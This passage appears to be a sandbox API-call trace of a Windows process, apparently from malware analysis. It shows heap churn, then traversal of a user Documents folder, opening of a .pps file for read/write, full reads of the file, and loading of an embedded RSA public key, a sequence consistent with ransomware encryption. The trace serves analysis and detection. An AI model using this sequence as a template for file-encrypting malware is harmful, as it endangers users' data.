returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.253] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\") returned="IcyHH4kvUj6MCZmB\\" [0200.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0200.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0200.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.253] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\") returned="4E_Qp5b8\\" [0200.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0200.254] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\") returned="HIm fL\\" [0200.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fba58 [0200.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.254] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0200.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a057e0 [0200.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fba58 | out: hHeap=0x2c0000) returned 1 [0200.255] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0200.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a057e0 | out: hHeap=0x2c0000) returned 1 [0200.255] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.256] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.256] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.256] PathFindFileNameW (pszPath="") returned="" [0200.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.256] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\icyhh4kvuj6mczmb\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed86fe00, ftCreationTime.dwHighDateTime=0x1d89ccf, ftLastAccessTime.dwLowDateTime=0xa5460440, ftLastAccessTime.dwHighDateTime=0x1d8a5e6, ftLastWriteTime.dwLowDateTime=0xa5460440, ftLastWriteTime.dwHighDateTime=0x1d8a5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05e28 [0200.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.257] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed86fe00, ftCreationTime.dwHighDateTime=0x1d89ccf, ftLastAccessTime.dwLowDateTime=0xa5460440, ftLastAccessTime.dwHighDateTime=0x1d8a5e6, ftLastWriteTime.dwLowDateTime=0xa5460440, ftLastWriteTime.dwHighDateTime=0x1d8a5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.258] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99035c0, ftCreationTime.dwHighDateTime=0x1d8a564, ftLastAccessTime.dwLowDateTime=0x55058220, ftLastAccessTime.dwHighDateTime=0x1d8a5ce, ftLastWriteTime.dwLowDateTime=0x55058220, ftLastWriteTime.dwHighDateTime=0x1d8a5ce, nFileSizeHigh=0x0, nFileSizeLow=0x116eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLDjOHMq5YqJ5Vaq-G-z.pps", cAlternateFileName="NLDJOH~1.PPS")) returned 1 [0200.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x2a19588 [0200.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.258] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\NLDjOHMq5YqJ5Vaq-G-z.pps") returned=".pps" [0200.258] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\IcyHH4kvUj6MCZmB\\NLDjOHMq5YqJ5Vaq-G-z.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\icyhh4kvuj6mczmb\\nldjohmq5yqj5vaq-g-z.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0200.259] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=71403) returned 1 [0200.259] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0200.262] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x116c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.262] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0200.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.266] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.266] ReadFile (in: hFile=0x52c, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x116eb, lpOverlapped=0x0) returned 1 [0200.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a79478 [0200.267] lstrlenA (lpString="-----BEGIN PUBLIC 